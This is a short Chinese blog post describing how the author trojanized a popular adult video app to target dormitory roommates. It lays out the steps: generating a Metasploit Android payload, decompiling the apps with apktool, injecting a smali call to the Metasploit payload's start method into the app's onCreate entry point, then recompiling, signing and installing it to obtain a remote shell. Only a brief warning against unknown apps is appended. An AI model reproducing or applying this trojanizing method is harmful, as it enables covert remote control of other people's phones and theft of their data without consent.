咱们寝室基本人手一个某某天堂,所以打算安排一下室友,感觉自己好邪恶ƪ(˘⌣˘)ʃ优雅。
首先msf生成木马文件muma.apk
然后对某某天堂和木马apk进行反编译,我这里用的是apktool:
然后得到两个文件夹
打开JMX找到AndroidManifest.xml文件打开,找到软件入口,软件入口一般在android.intent.action.MAIN的上面
软件入口:
找到入口对应的smali文件(软件入口把点换成/就能找到对应的smali文件)
直接搜索onCreat函数,找到bundle对象,你并在下面添加启动payload代码:invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
添加好后把payload的smail/com/metasploit文件复制到某某天堂的smail_classes2/com/目录下
然后用apktool进行编译:
签名:
手机进行安装:
手机能正常安装,也不管有没有报毒毕竟哪家H不报毒呢ƪ(˘⌣˘)ʃ优雅,lsp们还不是照样安装。
电脑打开msf进行监听:
手机打开软件:
msf成功上线:
能正常执行命令。
所以兄弟们千万不要下载来路不明的软件,如果非要使用可以用vmos虚拟机打开。结束♥(。→v←。)♥
突发奇想对某某天堂进行后门植入,反弹msf
最新推荐文章于 2024-04-10 19:55:19 发布